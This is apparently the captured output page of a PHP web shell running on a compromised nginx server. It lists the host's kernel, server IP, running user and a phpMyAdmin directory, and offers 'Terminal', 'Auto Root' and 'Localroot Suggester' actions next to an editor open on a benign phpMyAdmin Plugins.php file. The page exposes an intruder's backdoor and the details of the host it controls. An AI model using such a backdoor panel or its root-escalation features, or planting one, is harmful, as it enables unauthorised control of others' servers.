Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.133.142.101
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
myadmin /
libraries /
classes /
Server /
Delete
Unzip
Name
Size
Permission
Date
Action
Status
[ DIR ]
drwxr-xr-x
2020-10-15 12:07
Plugin.php
5.85
KB
-rw-r--r--
2021-02-05 18:27
Plugins.php
1.99
KB
-rw-r--r--
2021-02-05 18:27
Privileges.php
199.1
KB
-rw-r--r--
2021-02-05 18:27
Select.php
4.02
KB
-rw-r--r--
2021-02-05 18:27
UserGroups.php
14.56
KB
-rw-r--r--
2021-02-05 18:27
Users.php
1.61
KB
-rw-r--r--
2021-02-05 18:27
Save
Rename
<?php /** * Class Plugins * @package PhpMyAdmin\Server */ declare(strict_types=1); namespace PhpMyAdmin\Server; use PhpMyAdmin\DatabaseInterface; /** * Class Plugins * @package PhpMyAdmin\Server */ class Plugins { /** * @var DatabaseInterface */ private $dbi; /** * @param DatabaseInterface $dbi DatabaseInterface instance */ public function __construct(DatabaseInterface $dbi) { $this->dbi = $dbi; } /** * @return Plugin[] */ public function getAll(): array { global $cfg; $sql = 'SHOW PLUGINS'; if (! $cfg['Server']['DisableIS']) { $sql = 'SELECT * FROM information_schema.PLUGINS ORDER BY PLUGIN_TYPE, PLUGIN_NAME'; } $result = $this->dbi->query($sql); $plugins = []; while ($row = $this->dbi->fetchAssoc($result)) { $plugins[] = $this->mapRowToPlugin($row); } $this->dbi->freeResult($result); return $plugins; } /** * @param array $row Row fetched from database * @return Plugin */ private function mapRowToPlugin(array $row): Plugin { return Plugin::fromState([ 'name' => $row['PLUGIN_NAME'] ?? $row['Name'], 'version' => $row['PLUGIN_VERSION'] ?? null, 'status' => $row['PLUGIN_STATUS'] ?? $row['Status'], 'type' => $row['PLUGIN_TYPE'] ?? $row['Type'], 'typeVersion' => $row['PLUGIN_TYPE_VERSION'] ?? null, 'library' => $row['PLUGIN_LIBRARY'] ?? $row['Library'] ?? null, 'libraryVersion' => $row['PLUGIN_LIBRARY_VERSION'] ?? null, 'author' => $row['PLUGIN_AUTHOR'] ?? null, 'description' => $row['PLUGIN_DESCRIPTION'] ?? null, 'license' => $row['PLUGIN_LICENSE'] ?? $row['License'], 'loadOption' => $row['LOAD_OPTION'] ?? null, 'maturity' => $row['PLUGIN_MATURITY'] ?? null, 'authVersion' => $row['PLUGIN_AUTH_VERSION'] ?? null, ]); } }